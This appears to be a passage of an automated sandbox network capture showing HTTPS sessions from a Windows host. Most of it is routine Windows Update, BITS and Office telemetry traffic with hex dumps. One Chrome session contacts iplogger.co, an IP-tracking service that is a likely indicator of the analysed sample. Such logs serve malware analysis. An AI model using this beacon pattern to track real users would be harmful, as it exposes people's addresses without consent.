2024-11-30 11:47:11 UTC	1369	IN	Data Raw: 80 39 de dd c0 d5 c0 c5 c0 d2 56 8c 8b 30 e9 58 e0 9b c0 16 60 28 96 d3 0f 00 a9 54 48 1d 69 d5 03 e6 04 6f 3a bf 04 b8 17 f8 27 70 33 ad 5b fc 4c 78 10 71 fa 31 90 8d e5 f4 96 58 4e 2f 6a c5 a0 4d c1 9b ce b7 79 d3 f9 2b 81 7f 00 d7 21 72 bd 50 e8 06 1e 00 de 88 e5 f4 a9 46 91 36 85 a6 18 e0 4d e7 57 00 2f 22 bb 51 4b c6 17 02 ab 80 3f 02 f7 c5 72 ba a9 0d b0 66 80 37 9d 3f 07 d1 d0 a7 37 f3 c0 79 40 1b f0 2d 60 20 96 d3 c7 da 12 bb 66 80 37 9d f7 78 d3 f9 eb 80 df f2 d1 ee 7a 2d 9c 08 bc 16 cb e9 75 36 44 ae 18 e0 4d e7 3d c0 36 44 d9 f9 ec e7 b6 60 58 02 fc 3e 96 d3 e7 b8 d5 0b 0d 19 60 16 7f 1b d0 3f b7 b9 2d 18 da 81 a7 81 73 dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc Data Ascii: 9V0X`(THio:'p3[Lxq1XN/jMy+!rPF6MW/"QK?rf7?7y@-` f7xz-u6DM=6D`X>`?-s\_Vc&rzM9BdJp
2024-11-30 11:47:11 UTC	1183	IN	Data Raw: 3a 3f c6 47 2b 06 43 54 42 67 9b 68 10 24 7d 7f d4 6c bc 62 49 bc d9 5c 73 c0 33 96 b4 ad c4 7d c5 4c a2 6c 5a 65 dc e6 11 41 ac c6 34 06 bc 4e c5 94 b8 c1 05 de 74 be db c8 de 36 ea 87 ad f3 85 21 20 65 be af 03 56 58 d0 be 8d d1 7b 1e 90 86 45 84 09 6e d1 01 6c f5 a6 f3 14 33 89 bd c0 76 0b da 56 60 0a b8 a6 98 49 38 8c 7f 09 38 1f 78 d7 25 fd b3 4e 99 ac da 73 7a dc 72 12 97 00 9f 31 df b7 21 95 97 85 c2 76 60 67 b2 a0 49 16 b4 2f 15 52 e5 54 48 3d 03 7c 1a b8 09 63 e3 6b 60 0a c9 31 00 d3 19 b0 a3 01 e1 4c f8 80 9f 7a d3 f9 76 b3 13 5f 01 f6 37 a0 69 05 76 00 5b 8d f8 ad 02 b2 c9 82 de 62 18 31 9e 0a a9 3b 81 e3 90 8c d1 6c 0e de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e Data Ascii: :?G+CTBgh$}lbI\s3}LlZeA4Nt6! eVX{Enl3vV`I88x%Nszr1!v`gI/RTH=\|ck`1Lzv_7iv[b1;l.$\|4 iG6p,RY3dA/F0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:13 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-30 11:47:13 UTC	478	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=53564 Date: Sat, 30 Nov 2024 11:47:13 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	172.67.167.249	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:14 UTC	401	OUT	GET /favicon.ico HTTP/1.1 Host: iplogger.co Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 56396975137264100=2; clhf03028ja=8.46.123.228
2024-11-30 11:47:14 UTC	1088	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:47:14 GMT Content-Type: image/x-icon Content-Length: 2833 Connection: close last-modified: Tue, 07 Jun 2022 11:44:38 GMT etag: "629f3a26-b11" strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnQWHjunWF6U3QlofhFj54ZWrZiJMF6YDSk7nytF6BzvOrnTnRX5H%2FQ%2Bmaqfc1VRttsoUcSLwYhoI7Ud6%2Bf%2F%2Bk5FEpNR5bIei9crmULCp6HDNzakCl0HICAOooi%2BZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eaa99ff4cbc0c7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1673&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=979&delivery_rate=1745367&cwnd=194&unsent_bytes=0&cid=cb9e5fbf628c480f&ts=459&x=0"
2024-11-30 11:47:14 UTC	281	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}\|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
2024-11-30 11:47:14 UTC	1369	IN	Data Raw: 80 39 de dd c0 d5 c0 c5 c0 d2 56 8c 8b 30 e9 58 e0 9b c0 16 60 28 96 d3 0f 00 a9 54 48 1d 69 d5 03 e6 04 6f 3a bf 04 b8 17 f8 27 70 33 ad 5b fc 4c 78 10 71 fa 31 90 8d e5 f4 96 58 4e 2f 6a c5 a0 4d c1 9b ce b7 79 d3 f9 2b 81 7f 00 d7 21 72 bd 50 e8 06 1e 00 de 88 e5 f4 a9 46 91 36 85 a6 18 e0 4d e7 57 00 2f 22 bb 51 4b c6 17 02 ab 80 3f 02 f7 c5 72 ba a9 0d b0 66 80 37 9d 3f 07 d1 d0 a7 37 f3 c0 79 40 1b f0 2d 60 20 96 d3 c7 da 12 bb 66 80 37 9d f7 78 d3 f9 eb 80 df f2 d1 ee 7a 2d 9c 08 bc 16 cb e9 75 36 44 ae 18 e0 4d e7 3d c0 36 44 d9 f9 ec e7 b6 60 58 02 fc 3e 96 d3 e7 b8 d5 0b 0d 19 60 16 7f 1b d0 3f b7 b9 2d 18 da 81 a7 81 73 dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc Data Ascii: 9V0X`(THio:'p3[Lxq1XN/jMy+!rPF6MW/"QK?rf7?7y@-` f7xz-u6DM=6D`X>`?-s\_Vc&rzM9BdJp
2024-11-30 11:47:14 UTC	1183	IN	Data Raw: 3a 3f c6 47 2b 06 43 54 42 67 9b 68 10 24 7d 7f d4 6c bc 62 49 bc d9 5c 73 c0 33 96 b4 ad c4 7d c5 4c a2 6c 5a 65 dc e6 11 41 ac c6 34 06 bc 4e c5 94 b8 c1 05 de 74 be db c8 de 36 ea 87 ad f3 85 21 20 65 be af 03 56 58 d0 be 8d d1 7b 1e 90 86 45 84 09 6e d1 01 6c f5 a6 f3 14 33 89 bd c0 76 0b da 56 60 0a b8 a6 98 49 38 8c 7f 09 38 1f 78 d7 25 fd b3 4e 99 ac da 73 7a dc 72 12 97 00 9f 31 df b7 21 95 97 85 c2 76 60 67 b2 a0 49 16 b4 2f 15 52 e5 54 48 3d 03 7c 1a b8 09 63 e3 6b 60 0a c9 31 00 d3 19 b0 a3 01 e1 4c f8 80 9f 7a d3 f9 76 b3 13 5f 01 f6 37 a0 69 05 76 00 5b 8d f8 ad 02 b2 c9 82 de 62 18 31 9e 0a a9 3b 81 e3 90 8c d1 6c 0e de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e Data Ascii: :?G+CTBgh$}lbI\s3}LlZeA4Nt6! eVX{Enl3vV`I88x%Nszr1!v`gI/RTH=\|ck`1Lzv_7iv[b1;l.$\|4 iG6p,RY3dA/F0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:15 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-30 11:47:15 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=113331 Date: Sat, 30 Nov 2024 11:47:15 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-30 11:47:15 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:18 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UdDeAusWWV4YHsm&MD=+XvgSgZm HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-30 11:47:19 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 8b511300-6108-4a18-a246-288975d96734 MS-RequestId: 1ede34ab-8326-4901-8f90-06f3d5bccff0 MS-CV: JECpPC8NSECqmp68.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 30 Nov 2024 11:47:18 GMT Connection: close Content-Length: 24490
2024-11-30 11:47:19 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-30 11:47:19 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:59 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UdDeAusWWV4YHsm&MD=+XvgSgZm HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-30 11:47:59 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: b4323365-1499-4a59-97b4-46ae39fb45c7 MS-RequestId: 94c73235-a53a-4842-ba62-d510b00dd03e MS-CV: h9nXZt24F0C9E51V.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 30 Nov 2024 11:47:58 GMT Connection: close Content-Length: 30005
2024-11-30 11:47:59 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-30 11:47:59 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49753	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:59 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:47:59 UTC	471	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:47:59 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT ETag: "0x8DD0EF5BC53602D" x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114759Z-174f7845968vqt9xhC1EWRgten00000011d0000000006d7s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:47:59 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-30 11:47:59 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-30 11:47:59 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-30 11:47:59 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-30 11:47:59 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-30 11:47:59 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" 